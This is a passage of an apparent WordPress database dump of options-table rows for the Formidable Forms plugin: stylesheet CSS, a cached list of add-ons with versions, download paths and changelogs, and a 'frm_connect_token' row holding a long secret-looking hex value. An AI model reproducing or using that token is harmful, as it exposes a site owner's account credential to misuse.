.frm_form_field.frm_eighth .frm_primary_label{display: block !important;}}@media only screen and (max-width: 600px) {.frm_form_field.frm_four_col .frm_opt_container{grid-template-columns: repeat(2, 1fr);}.with_frm_style .frm_repeat_inline,.with_frm_style .frm_repeat_grid{margin: 20px 0;}}@media only screen and (max-width: 500px) {.frm_form_field.frm_two_col .frm_radio,.frm_form_field.frm_two_col .frm_checkbox,.frm_form_field.frm_three_col .frm_radio,.frm_form_field.frm_three_col .frm_checkbox{width: auto;margin-right: 0;float: none;display:block;}.frm_form_field input[type=file] {max-width:220px;}.with_frm_style .frm-g-recaptcha > div > div,.with_frm_style .g-recaptcha > div > div{width:inherit !important;display:block;overflow:hidden;max-width:302px;border-right:1px solid #d3d3d3;border-radius:4px;box-shadow:2px 0px 4px -1px rgba(0,0,0,.08);-moz-box-shadow:2px 0px 4px -1px rgba(0,0,0,.08);}.with_frm_style .g-recaptcha iframe,.with_frm_style .frm-g-recaptcha iframe{width:100%;}}','no'),
(359455,'frm_connect_token','295d7007346719eca1fbd201267f6edb9ec9e107ef280bfceedc9cdeb593ece0864fe44f2fe33b3b844b039cc04ba3a7a36e163eaf60c7e27d17d1fdf5e31d24','yes'),
(359457,'frm_addons_l','a:3:{s:7:\"timeout\";i:1692763107;s:5:\"value\";s:127905:\"{\"28158728\":{\"title\":\"ACF Forms\",\"name\":\"ACF Forms\",\"display_name\":\"ACF Forms\",\"slug\":\"acf-forms\",\"version\":\"1.0.1\",\"new_version\":\"1.0.1\",\"location\":[\"fp.strategy11.com\\/releases\\/acf\\/formidable-acf-1.0.1.zip\"],\"excerpt\":\"Sync custom fields between Formidable and Advanced Custom Fields or ACF Pro.\",\"id\":28158728,\"released\":\"2022-12-13 00:00:00\",\"categories\":[\"Business\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/acf-form\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/acf-forms\\/\",\"changelog\":\"<h4>v1.0.1 - July 6, 2023<\\/h4>\\n<ul>\\n<li>Fix: Repeater values were not appearing for posts until the post was manually updated.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-acf\\/formidable-acf.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"advanced, custom fields\",\"is_new\":false},\"20790298\":{\"title\":\"Active Campaign\",\"name\":\"Active Campaign\",\"display_name\":\"ActiveCampaign\",\"slug\":\"activecampaign-wordpress-plugin\",\"version\":\"1.08\",\"new_version\":\"1.08\",\"location\":[\"fp.strategy11.com\\/releases\\/activecampaign\\/formidable-activecampaign-1.08.zip\"],\"excerpt\":\"Add contacts to any ActiveCampaign list from your WordPress forms.\",\"id\":20790298,\"released\":\"2018-07-05 00:00:00\",\"categories\":[\"Elite\",\"Marketing\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/activecampaign-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/activecampaign-wordpress-plugin\\/\",\"changelog\":\"<h4>v1.08 - June 16, 2021<\\/h4>\\n<ul>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to ActiveCampaign.<\\/li>\\n<li>Fix: Errors messages were not displaying properly in settings when an ActiveCampaign trial had expired.<\\/li>\\n<li>Fix: Nothing would get sent when a user id field was set to something other than a name or email option.<\\/li>\\n<\\/ul>\\n<h4>v1.07 - April 12, 2021<\\/h4>\\n<p>- Fix: Contacts were not always properly being resubscribed after unsubscribing, even when the resubscribe checkbox was checked.<br \\/>\\n- Fix: Properly send data as an array when sending data to a custom Active Campaign Checkbox field.<br \\/>\\n- Fix: Only send the file url to Active Campaign instead of the HTML display value when a file field is set.<\\/p>\\n<h4>v1.06.01 - November 3, 2020<\\/h4>\\n<ul>\\n<li>Fix: Keep the \\\"resubscribe\\\" box checked<\\/li>\\n<li>Remove the recently added Custom Automation option for opt-in since you can\'t build an automation for unconfirmed users<\\/li>\\n<\\/ul>\\n<h4>v1.06 - August 7, 2020<\\/h4>\\n<ul>\\n<li>New: Select an AC form for double opt-in<\\/li>\\n<li>New: Add option to resubscribe a contact instead of forcing it. By default, contacts will not be resubscribed.<\\/li>\\n<li>New: When a contact is updated, don\'t remove them from other lists they are on.<\\/li>\\n<li>New: Update the contact when email is changed instead of creating a new contact.<\\/li>\\n<li>Cleanup global settings and form action settings.<\\/li>\\n<li>Removed unused hidden fields in the form.<\\/li>\\n<\\/ul>\\n<h4>v1.05 - April 15, 2019<\\/h4>\\n<ul>\\n<li>Fix the icon used to create an ActiveCampaign action.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-activecampaign\\/formidable-activecampaign.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"ActiveCampaign\",\"is_new\":false},\"28189169\":{\"title\":\"AI\",\"name\":\"AI\",\"display_name\":\"AI Forms\",\"slug\":\"ai\",\"version\":\"1.0.1\",\"new_version\":\"1.0.1\",\"location\":[\"fp.strategy11.com\\/releases\\/ai\\/formidable-ai-1.0.1.zip\"],\"excerpt\":\"Get back your time by autogenerating a response from ChatGPT and inserting it into a field.\",\"id\":28189169,\"released\":\"2023-04-11 00:00:00\",\"categories\":[\"Business\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/form-ai\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/ai\\/\",\"changelog\":\"<h4>v1.0.1 - May 3, 2023<\\/h4>\\n<ul>\\n<li>New: AI fields will now watch more types of fields including address fields, name fields, radio buttons, dropdowns, checkboxes, embedded fields.<\\/li>\\n<li>New: Line breaks in AI responses will now be preserved.<\\/li>\\n<li>Fix: A missing null check would cause a JavaScript error to break some forms when the AI answer isn\'t included in the form.<\\/li>\\n<li>An ongoing AI request will now be aborted early when a new request begins.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-ai\\/formidable-ai.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"chatgpt, openai, automate\",\"is_new\":false},\"28123670\":{\"title\":\"Application Shortcuts\",\"name\":\"Application Shortcuts\",\"display_name\":\"Application Shortcuts\",\"slug\":\"application-shortcuts\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28123670,\"released\":\"2022-05-02 13:38:05\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/application-shortcuts\\/\",\"changelog\":\"\",\"plugin\":\"application-shortcuts\\/application-shortcuts.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"337527\":{\"title\":\"Authorize.net AIM\",\"name\":\"Authorize.net AIM\",\"display_name\":\"Authorize.net AIM\",\"slug\":\"authorize-net-aim\",\"version\":\"2.02\",\"new_version\":\"2.02\",\"location\":[\"fp.strategy11.com\\/releases\\/authorize-net\\/formidable-authorize-net-2.02.zip\"],\"excerpt\":\"Accept one-time payments directly on your site, using Authorize.net AIM.\",\"id\":337527,\"released\":\"2016-04-29 00:00:00\",\"categories\":[\"Ecommerce\",\"Elite\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/authorize-net-aim\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/authorize-net-aim\\/\",\"changelog\":\"<h4>v2.02 - March 7, 2022<\\/h4>\\n<ul>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to Authorize.net.<\\/li>\\n<li>New: Set the default currency to the one selected in global settings.<\\/li>\\n<li>New: Added additional currencies from Pro.<\\/li>\\n<li>Fix: Payments would not work if the amount specified was formatted as currency.<\\/li>\\n<li>Fix: Prevent a fatal error that happens in PHP8 when filling payment information.<\\/li>\\n<li>Fix: Expire dates were not properly calculating.<\\/li>\\n<li>Fix: Some echecks were not getting approved.<\\/li>\\n<li>Fix: Updated incorrect text domains.<\\/li>\\n<\\/ul>\\n<h4>v2.01 - March 18, 2019<\\/h4>\\n<ul>\\n<li>Fix: Increase the timeout for creating the payment on Authorize.net in order to prevent false failures.<\\/li>\\n<li>Save the full API response in the log instead of only the body of the response for more helpful debugging messages.<\\/li>\\n<\\/ul>\\n<h4>v2.0 - February 25, 2019<\\/h4>\\n<ul>\\n<li>Requires Formidable 3.0+ and WordPress 4.7+<\\/li>\\n<li>New: Remove the Authorize.net SDK. This greatly reduces the size of the plugin, and resolves PHP 7.0+ compatibility issues.<\\/li>\\n<li>New: Use Webhooks to get notifications from Authorize.net to a REST endpoint when a payment status changes. This includes refunds, voids, and completed transactions. A webhook will be automatically created when the Formidable -&gt; Global settings page is saved.<\\/li>\\n<li>New: Added signature key to Global settings page and removed the Silent Post url. This is used to verify any incoming webhooks.<\\/li>\\n<li>New: Don\'t use MD5 verification, but meet the new sha512 requirement instead.<\\/li>\\n<li>New: Add Bangladeshi Taka currency<\\/li>\\n<li>Fix: Replace usage of deprecated file and functions from Formidable<\\/li>\\n<li>Fix: Added escaping for translatable strings.<\\/li>\\n<\\/ul>\\n<h4>v1.02 - August 31, 2018<\\/h4>\\n<ul>\\n<li>New: Delete entries that don\'t pass credit card validation<\\/li>\\n<li>New: Process shortcodes in the payment amount, description, and actions after payment. This includes default values, field values, and regular WP shortcodes.<\\/li>\\n<li>New: Allow the api key to be overridden with constants. The Authorize account can be set with AUTHORIZENET_TRANSACTION_KEY and AUTHORIZENET_API_LOGIN_ID<\\/li>\\n<li>New: Disable live mode for non-ssl sites. Show the settings and always allow test mode.<\\/li>\\n<li>New: Add option to register user after successful payment<\\/li>\\n<li>New: Add payment triggers to api action<\\/li>\\n<li>New: Add receipt ID shortcode<\\/li>\\n<li>New: Add Pakistani rupee, Chinese Renminbi Yuan, South African Rand, and Sri Lankan Rupee to currency options<\\/li>\\n<li>New: If PayPal is also installed, show the PayPal payment completed status<\\/li>\\n<li>New: Add frm_pay_[payment type]_sidebar hook for adding content to the sidebar of a single payment<\\/li>\\n<li>Fix: Include the customer info with an echeck. Show the address fields in eCheck settings. When only eCheck is selected, the extra fields were not set to show or send to Authnet<\\/li>\\n<li>Fix: Replace the included SSL cert since it is causing errors on some servers<\\/li>\\n<li>Fix: Filter description shortcodes on subscriptions page<\\/li>\\n<li>Fix: Create the post (if applicable) before fields are updated<\\/li>\\n<li>Fix: Use credit card icon instead of Stripe. This will show in 3.0.<\\/li>\\n<li>Fix: Update the gateway field for better 3.0 compatibility<\\/li>\\n<\\/ul>\\n<h4>v1.01 - December 12, 2016<\\/h4>\\n<ul>\\n<li>Prevent errors when Formidable is deactivated<\\/li>\\n<li>Add frm_authnet_invoice_num hook for setting the invoice number<\\/li>\\n<li>Add a link to view the subscriptions<\\/li>\\n<li>If the subscription has failed &gt; 3 times, set it to canceled<\\/li>\\n<li>Show more error messages to a user when the payment fails<\\/li>\\n<li>Remove plugin header for nested plugin to prevent error message when activating from the plugins upload page<\\/li>\\n<li>Use the correct currency for the total on the entry sidebar instead of defaulting to USD<\\/li>\\n<li>Allow field shortcodes in description<\\/li>\\n<li>Add Indian Rupee to currency options<\\/li>\\n<li>Add table headings and subscription description to the frm-subscriptions shortcode<\\/li>\\n<li>Prevent field ids from being used as the amount<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-authorize-net\\/formidable-authorize-net.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"Authorize.net\",\"is_new\":false},\"168468\":{\"title\":\"AWeber\",\"name\":\"AWeber\",\"display_name\":\"AWeber\",\"slug\":\"aweber\",\"version\":\"2.03\",\"new_version\":\"2.03\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-aweber\\/formidable-aweber-2.03.zip\"],\"excerpt\":\"AWeber is a powerful email marketing service. Subscribe contacts to an AWeber mailing list when they submit your WordPress contact forms.\",\"id\":168468,\"released\":\"2013-11-26 00:00:00\",\"categories\":[\"Creator\",\"Marketing\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-aweber\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/aweber\\/\",\"changelog\":\"<h4>v2.04 - April 20, 2023<\\/h4>\\n<ul>\\n<li>Fix: OAuth tokens were not properly getting parsed from the AWeber response. This broke new authentication requests.<\\/li>\\n<li>Fix: Error messages when authenticating were not visible.<\\/li>\\n<\\/ul>\\n<h4>v2.03 - March 3, 2022<\\/h4>\\n<ul>\\n<li>New: Subscription errors and successful subscriptions will now be logged if the Formidable Logs add on is available.<\\/li>\\n<li>Fix: Accents will now be removed from characters when subscribing to avoid issues with special accented characters breaking in names in AWeber.<\\/li>\\n<\\/ul>\\n<h4>v2.02 - October 14, 2020<\\/h4>\\n<ul>\\n<li>New: Add comma separated tags to your AWeber actions<\\/li>\\n<li>New: Add an ad tracking category to your AWeber actions<\\/li>\\n<li>New: Improved plugin security<\\/li>\\n<li>New: Updated the icon for AWeber in settings<\\/li>\\n<li>Fix: Support PHP 7+<\\/li>\\n<li>Fix: Add download id for more autoupdating<\\/li>\\n<li>Code: Removed Formidable &lt; v2.0 fallbacks. This version will not work with a Formidable version below 2.0.<\\/li>\\n<\\/ul>\\n<h4>v2.01 - February 4, 2016<\\/h4>\\n<ul>\\n<li>Make sure the update notice doesn\'t show if the plugin is up to date<\\/li>\\n<\\/ul>\\n<h4>v2.0 - January 15, 2016<\\/h4>\\n<ul>\\n<li>Move the AWeber settings into a form action<\\/li>\\n<li>Make the plugin translatable<\\/li>\\n<li>Now it works with the free version of Formidable<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-aweber\\/formidable-aweber.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"168463\":{\"title\":\"Bootstrap\",\"name\":\"Bootstrap\",\"display_name\":\"Bootstrap\",\"slug\":\"bootstrap\",\"version\":\"1.03\",\"new_version\":\"1.03\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-bootstrap\\/formidable-bootstrap-1.03.zip\"],\"excerpt\":\"Instantly add Bootstrap styling to all your Formidable forms.\",\"id\":168463,\"released\":\"2014-08-05 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-bootstrap\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/bootstrap\\/\",\"changelog\":\"<h4>vv1.03 - January 18, 2021<\\/h4>\\n<ul>\\n<li>This update requires action. After updating, click the link to migrate the old settings.<strong> If you save a form with Bootstrap field options before running this migration, you risk losing those settings.<\\/strong><\\/li>\\n<li>New: Moved Prepend and Append Bootstrap field options to Before Input and After Input.<\\/li>\\n<li>New: Errors are now shown by default and can no longer be turned off<\\/li>\\n<li>New: Improved plugin security<\\/li>\\n<li>New: Added bootstrap CSS file directly into plugin for GDPR compliance<\\/li>\\n<\\/ul>\\n<h4>v1.02.02 - October 9, 2017<\\/h4>\\n<ul>\\n<li>Enhancement: Allow prepend and append options with dropdowns.<\\/li>\\n<\\/ul>\\n<h4>v1.02.01 - March 8, 2017<\\/h4>\\n<ul>\\n<li>Enhancement: Update Bootstrap version to 3.3.7.<\\/li>\\n<li>Enhancement: Add prepend and append options to Lookup &gt; Text fields<\\/li>\\n<\\/ul>\\n<h4>v1.02 - December 13, 2016<\\/h4>\\n<ul>\\n<li>Enhancement: Update Bootstrap version to 3.3.6.<\\/li>\\n<li>Fix: Make sure modified [input] tag works well with Bootstrap append.<\\/li>\\n<li>Fix: Add Bootstrap ID so automatic updates work in the future.<\\/li>\\n<li>Fix: Make sure Lookup checkbox and radio fields look nice.<\\/li>\\n<\\/ul>\\n<h4>v1.01.04 - November 13, 2015<\\/h4>\\n<ul>\\n<li>Prevent errors with Formidable disabled<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-bootstrap\\/formidable-bootstrap.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"185013\":{\"title\":\"Bootstrap Modal\",\"name\":\"Bootstrap Modal\",\"display_name\":\"Bootstrap Modal\",\"slug\":\"bootstrap-modal\",\"version\":\"3.0.1\",\"new_version\":\"3.0.1\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-modal\\/formidable-modal-3.0.1.zip\"],\"excerpt\":\"Open forms, views, other shortcodes, or sections of content in a Bootstrap popup.\",\"id\":185013,\"released\":\"2015-08-26 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/bootstrap-modal\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/bootstrap-modal\\/\",\"changelog\":\"<h4>v3.0.1 - June 26, 2023<\\/h4>\\n<ul>\\n<li>Fix: Modals were hidden when the Formidable Bootstrap add on was also active.<\\/li>\\n<li>Fix: Modals made with the [frmmodal-content] shortcode were missing a backdrop.<\\/li>\\n<\\/ul>\\n<h4>v3.0 - June 13, 2023<\\/h4>\\n<ul>\\n<li>New: A Gutenberg block has been added to make modals easier to embed.<\\/li>\\n<li>New: A new <span class=\\\"blob-code-inner blob-code-marker js-code-nav-pass \\\" data-code-marker=\\\"+\\\"><span class=\\\"pl-s x\\\">frm_modal_link<\\/span><\\/span> filter has been added for customizing the modal link trigger HTML.<\\/li>\\n<\\/ul>\\n<h4>v2.0 - August 21, 2017<\\/h4>\\n<ul>\\n<li>Add a new shortcode format for more flexibility. Now you can include whatever you\'d like in the modal.<br \\/>\\n[ frmmodal-content]content here[\\/frmmodal-content]<\\/li>\\n<li>Add frm_modal_shortcode action hook. This is for triggering external scripts that are loaded too late when they aren\'t triggered until the footer.<\\/li>\\n<li>Add modal_class shortcode option. This will add a class to the generated modal.<\\/li>\\n<\\/ul>\\n<h4>v1.04 - April 4, 2016<\\/h4>\\n<ul>\\n<li>Allow size=small or size=large to change the modal size<\\/li>\\n<li>Add modal_title parameter to the shortcode<\\/li>\\n<li>Make sure modal works when no forms are present on the page<\\/li>\\n<li>Fix plugin URI<\\/li>\\n<\\/ul>\\n<h4>v1.03 - January 18, 2016<\\/h4>\\n<ul>\\n<li>Make sure multiple modals on a page work correctly<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-modal\\/formidable-modal.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"modal, popup\",\"is_new\":false},\"28144089\":{\"title\":\"Business Directory\",\"name\":\"Business Directory\",\"display_name\":\"Business Directory\",\"slug\":\"business-directory\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28144089,\"released\":\"2022-08-24 16:41:02\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/business-directory\\/\",\"changelog\":\"\",\"plugin\":\"business-directory\\/business-directory.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28123666\":{\"title\":\"Business Hours\",\"name\":\"Business Hours\",\"display_name\":\"Business Hours\",\"slug\":\"business-hours\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28123666,\"released\":\"2022-05-02 13:25:15\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/business-hours\\/\",\"changelog\":\"\",\"plugin\":\"business-hours\\/business-hours.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20891694\":{\"title\":\"Campaign Monitor\",\"name\":\"Campaign Monitor\",\"display_name\":\"Campaign Monitor\",\"slug\":\"campaign-monitor\",\"version\":\"1.04\",\"new_version\":\"1.04\",\"location\":[\"fp.strategy11.com\\/releases\\/campaign-monitor\\/formidable-campaignmonitor-1.04.zip\"],\"excerpt\":\"Save time by automatically sending leads from WordPress forms to Campaign Monitor.\",\"id\":20891694,\"released\":\"2019-06-17 00:00:00\",\"categories\":[\"Business\",\"Marketing\"],\"docs\":\"\\/knowledgebase\\/campaign-monitor-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/campaign-monitor\\/\",\"changelog\":\"<h4>v1.04 - June 23, 2021<\\/h4>\\n<ul>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to Campaign Monitor.<\\/li>\\n<li>Fix: Nothing would get sent when a user id field was set to something other than a name or email option.<\\/li>\\n<li>Fix: Prevent a fatal error that happens in PHP8 after trying to save Campaign Monitor API keys.<\\/li>\\n<li>Fix: Prevent a fatal error that happens in PHP8 after trying to load the fields for a specific contact list.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-campaignmonitor\\/formidable-campaignmonitor.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20826884\":{\"title\":\"Constant Contact\",\"name\":\"Constant Contact\",\"display_name\":\"Constant Contact\",\"slug\":\"constant-contact\",\"version\":\"1.04\",\"new_version\":\"1.04\",\"location\":[\"fp.strategy11.com\\/releases\\/constant-contact\\/formidable-constantcontact-1.04.zip\"],\"excerpt\":\"Setup WordPress forms to create leads automatically in Constant Contact. Just select a list and match up form fields.\",\"id\":20826884,\"released\":\"2018-10-15 00:00:00\",\"categories\":[\"Business\",\"Marketing\"],\"docs\":\"\\/knowledgebase\\/constant-contact-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/constant-contact\\/\",\"changelog\":\"<h4>v1.05 - June 20, 2023<\\/h4>\\n<ul>\\n<li>New: Contact list options are now sorted alphabetically to make it easier to locate a target list.<\\/li>\\n<li>Fix: Address values were not getting set properly for new contacts.<\\/li>\\n<\\/ul>\\n<h4>v1.04 - June 22, 2022<\\/h4>\\n<ul>\\n<li>New: Updated the Authorization service for Constant Contact. Please re-connect as soon as possible to the new service to ensure that your connection does not break in the future when the old service is removed.<\\/li>\\n<li>Fix: Refresh tokens would become expired and break connections when trying to use the same Constant Contact account with multiple websites.<\\/li>\\n<li>Fix: A 409 error was getting triggered when sending an email to multiple lists with a single form submission throwing an error that the email already exists for the contact.<\\/li>\\n<\\/ul>\\n<h4>v1.03 - September 9, 2021<\\/h4>\\n<ul>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to Constant Contact.<\\/li>\\n<li>Fix: Nothing would get sent when a user id field was set to something other than a name or email option.<\\/li>\\n<\\/ul>\\n<h4>v1.02 - December 12, 2019<\\/h4>\\n<ul>\\n<li>New: Make authenticating easier<\\/li>\\n<li>Show more helpful error messages in the global settings and in the form action<\\/li>\\n<li>Use icon instead of image for form action<\\/li>\\n<li>Update form action layout to match v4.0<\\/li>\\n<li>Remove debug mode in favor of logging<\\/li>\\n<li>Fix: When different forms are used to update a contact, only the most recent info was saved and previous values were removed (ie custom fields, selected lists)<\\/li>\\n<li>Fix: If a contact was deleted in Constant Contact, it was causing a failure when updating the contact from Formidable<\\/li>\\n<\\/ul>\\n<h4>v1.01 - October 31, 2018<\\/h4>\\n<ul>\\n<li>Fix: On first install, the Global settings page was not loaded correctly<\\/li>\\n<li>Fix: Allow the debug mode checkbox to be unchecked<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-constantcontact\\/formidable-constantcontact.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28100793\":{\"title\":\"Conversational Forms\",\"name\":\"Conversational Forms\",\"display_name\":\"Conversational Forms\",\"slug\":\"conversational-forms\",\"version\":\"1.0.04\",\"new_version\":\"1.0.04\",\"location\":[\"fp.strategy11.com\\/releases\\/chat\\/formidable-chat-1.0.04.zip\"],\"excerpt\":\"Ask one question at a time to humanize forms and boost their conversion rates.\",\"id\":28100793,\"released\":\"2022-01-25 00:00:00\",\"categories\":[\"Business\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/conversational-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/conversational-forms\\/\",\"changelog\":\"<h4>v1.0.04 - August 7, 2023<\\/h4>\\n<ul>\\n<li>Security: Additional filtering and escaping is now applied to the submit button text setting.<\\/li>\\n<li>Fix: Datepickers would flash and disappear when focused after advancing.<\\/li>\\n<li>Fix: Submit button conditional logic was not working in some cases.<\\/li>\\n<li>Fix: Fields inside of a conditional section were not conditionally hiding when the section was hidden.<\\/li>\\n<\\/ul>\\n<h4>v1.0.03 - December 6, 2022<\\/h4>\\n<ul>\\n<li>New: Stripe payment element fields used for Stripe link will now be counted in conversational progress bars.<\\/li>\\n<li>New: Updated how the conversational Lines style is assigned to improve compatibility with the Stripe Appearance API used for Stripe link payment elements.<\\/li>\\n<li>New: Added additional button styles for conversational navigation buttons.<\\/li>\\n<li>Fix: An inline datepicker would cause a conversational form to break.<\\/li>\\n<li>Fix: Prevent overflowing borders from getting cut in conversational forms.<\\/li>\\n<li>Fix: Prevent a \\\"state.activeForm.querySelector is not a function\\\" JavaScript error when a page loads with no forms available that can happen when using modals.<\\/li>\\n<\\/ul>\\n<h4>v1.0.02 - August 1, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new \\\"Show start page\\\" toggle to conversational form settings to make it easier to enable and disable than before.<\\/li>\\n<li>Fix: Some conversational forms were breaking on some servers, including forms in Elementor pop ups, with an error stating that the get_plugin_data function does not exist.<\\/li>\\n<\\/ul>\\n<h4>v1.0.01 - March 16, 2022<\\/h4>\\n<ul>\\n<li>New: Section titles and descriptions will now be shown as a separate question in a conversational form, displayed as field labels. When moving between fields in a section a section heading will be shown with each row.<\\/li>\\n<li>New: Conversational start pages will no longer be displayed if the title and description are both hidden in the conversational form.<\\/li>\\n<li>Fix: Conversational forms would always display a title or description even if the title=false and description=false options were set.<\\/li>\\n<li>Fix: Improved support for loading multiple conversational forms with API embedded script tags.<\\/li>\\n<li>Fix: Automatic focusing on page load will now only happen in conversational forms on landing pages and on preview pages to prevent issues with forms getting focused in the middle of a long page.<\\/li>\\n<li>Fix: Conditional logic on submit buttons was occasionally not working as expected when the \\\"Hide submit button\\\" option was used.<\\/li>\\n<li>Fix: Sections with label positions set to a value other than top were triggering a breaking error.<\\/li>\\n<li>Fix: Fixed a conflict with the Twenty Twenty theme that was causing the press enter icon to appear in the wrong position in the page.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-chat\\/formidable-chat.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20247260\":{\"title\":\"Datepicker Options\",\"name\":\"Datepicker Options\",\"display_name\":\"Datepicker 